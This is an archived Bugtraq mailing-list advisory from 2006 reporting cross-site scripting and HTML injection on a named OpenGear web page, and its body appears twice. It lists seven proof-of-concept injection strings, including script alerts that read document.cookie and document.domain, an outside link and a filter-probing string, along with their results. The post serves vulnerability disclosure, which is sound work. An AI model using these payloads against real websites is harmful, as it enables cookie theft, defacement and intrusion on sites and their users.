Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
XSS Bug in OpenGear Server Website
Apr 24 2006 02:50PM
Aditya Metaeye Org
0x0*] Advisory
==============
Web Penetrated By:- Aditya (at) Metaeye (dot) Org [email concealed]
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
==============
Web Penetrated By:- Aditya (at) Metaeye (dot) Org [email concealed]
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
[ reply ]